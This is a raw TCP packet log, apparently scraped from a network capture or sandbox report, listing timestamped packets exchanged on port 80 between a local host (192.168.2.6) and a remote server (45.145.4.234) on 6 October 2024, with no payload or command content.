                                                                                                                                                Oct 6, 2024 22:18:48.043071032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043076992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043081999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043092012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043092966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043127060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043503046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043509960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043514967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043519974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043530941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043534994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043540955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043545008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043550968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043559074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043567896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043575048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043584108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043603897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043626070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043780088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043787003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043797970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043847084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043924093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043930054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043940067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043946028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043951035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043956041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043962002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043973923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043977976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043982983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.043987036 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.043988943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.044013977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.044039011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142235041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142247915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142258883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142296076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142304897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142316103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142319918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142327070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142384052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142390013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142424107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142431974 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142467022 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142508030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142517090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142525911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142535925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142553091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142594099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142632961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142643929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142652988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142678976 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142683029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142693043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142699957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142704010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142714024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142724037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142738104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142775059 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.142896891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142905951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.142942905 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143028021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143038034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143045902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143054008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143064022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143069983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143073082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143084049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143091917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143100977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143104076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143116951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143134117 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143160105 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143320084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143330097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143338919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143348932 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143358946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143368006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143376112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143378973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143398046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143407106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143419027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143420935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143429995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143448114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143472910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143657923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143666983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143677950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143687010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143697023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143697977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143707037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143716097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143724918 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143749952 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143764019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143774033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143779993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143785954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143790007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143799067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143804073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143809080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.143841982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143841982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.143857956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.144340992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144351006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144361019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144370079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144375086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144381046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144386053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144399881 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144409895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144418955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144429922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144433975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144438028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.144438982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144449949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144459963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144469023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144479036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144481897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144485950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.144486904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144485950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.144485950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.144500017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144509077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144511938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.144515991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144526005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144536018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144546032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.144572973 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.144592047 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.145215988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145226955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145231009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145234108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145239115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145243883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145257950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145262003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145271063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145276070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145283937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145292997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145308018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145309925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.145318985 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145328999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145365953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145370007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145370960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.145375013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145385027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145390034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145395041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145402908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145414114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145420074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.145425081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145435095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145443916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145466089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.145488977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.145901918 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145926952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145935059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.145956993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.146011114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.146023035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146032095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146042109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146054029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146068096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.146096945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.146179914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146189928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146198988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146207094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146215916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146224022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146225929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.146234035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146243095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146254063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146262884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146271944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.146290064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.146316051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.146338940 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229161978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229176998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229193926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229204893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229216099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229226112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229237080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229341984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229393005 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229458094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229471922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229481936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229491949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229501963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229505062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229511976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229521990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229532003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229551077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229588032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229691029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229721069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229737997 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229754925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229769945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229790926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229801893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229825020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229839087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229860067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229882002 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229892969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229898930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229933977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.229944944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.229976892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230001926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230010033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230021954 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230106115 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230113983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230148077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230159044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230180979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230191946 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230230093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230233908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230268955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230274916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230305910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230317116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230340004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230351925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230381966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230386019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230413914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230427027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230448008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230456114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230482101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230492115 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230516911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230540991 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230551958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230556965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230585098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230592012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230619907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230626106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230654955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230664015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230688095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230698109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230725050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230731964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230761051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230768919 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230796099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230803013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230828047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230838060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230863094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230870008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230895042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230904102 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230928898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230937004 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230963945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.230973959 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.230998993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231004953 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231033087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231040955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231070042 CEST806388545.145.4.234192.168.2.6
